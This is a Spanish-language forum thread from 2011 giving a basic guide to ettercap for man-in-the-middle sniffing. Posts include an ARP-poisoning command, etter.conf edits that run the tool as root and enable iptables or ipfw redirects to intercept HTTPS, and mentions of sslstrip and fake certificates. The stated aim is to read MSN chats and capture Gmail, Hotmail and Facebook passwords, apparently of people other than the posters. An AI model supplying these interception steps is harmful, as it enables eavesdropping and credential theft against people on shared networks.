ettercap [manual basico]

Publicado por D3M0N, 26 de Marzo de 2011, 05:07:16 PM

Tema anterior - Siguiente tema

0 Miembros y 2 Visitantes están viendo este tema.

D3M0N

Si mira, estas paginas como gmail y hotmail tiene proteccion https... Ettercap es capaz de falsificar certificados https. Para que puedas leer el trafico necesitas modificar el archivo etter.conf y busca la parte de redireccionamiento.

La otra opcion para poder leer https es utilizar la aplicacion sslstrip. You are not allowed to view links. Register or Login

aca tengo un videito: You are not allowed to view links. Register or Login

diego10

puedo leer conversaciones de MSN en tiempo real.
lo de extraer usuarios y pass de gmail etc. etc. seguro aparecera en la ventana User messages ?

el tema es que tambien instale el openssl creyendo que es la forma correcta :P vaya saber...

diego10

aca va un comando que resume lo del tuto

sudo ettercap -Tq -ien2 -M ARP //

ATENCION: ien2 (es la placa de red usada, hay que editar)

D3M0N

You are not allowed to view links. Register or Login
sudo nano /opt/local/etc/etter.conf

The following lines, which are at the top of the file, need to be modified. Replace 65534 with 0.

ec_uid = 0 # nobody is the default
ec_gid = 0 # nobody is the default
Then search for the next lines by hitting ctrl-w, typing “redirect_command” and scrolling down a little till you see the Mac OSX section. Right now we are just going to use the “quick and dirty way” but you can also create those scripts yourself and use them too.

All this means it uncommenting the two lines by removing the # at the start.

#---------------
# Mac Os X
#---------------

# quick and dirty way:
redir_command_on = "ipfw add fwd 127.0.0.1,%rport tcp from any to any %port in via %iface"
redir_command_off = "ipfw -q flush"
Now hit ctrl-O to save and ctrl-X to exit nano.

la de "Now hit ctrl-O to save and ctrl-X to exit nano." ponele un # ya que es un comentario.

wirs

#19
se pueden leer conversaciones en msn en vivo con el cain and abel? el sniffer de windows ?

diogenes

You are not allowed to view links. Register or Login
para habilitar el SSL hay q modificar en el archivo etter.conf esta linea:

#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"</p>

y cambiarla por la de abajo?


Cídigo:

redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
hola estuve jugando con esto en mi propia red y capture bien mis credenciales pero con las pag del tipo ssl probe activarlo cambiando el codigo en etter.config y no tuve exito ya no funca esa modificacion?? osea para capturar credenciales de facebook hotmail etc...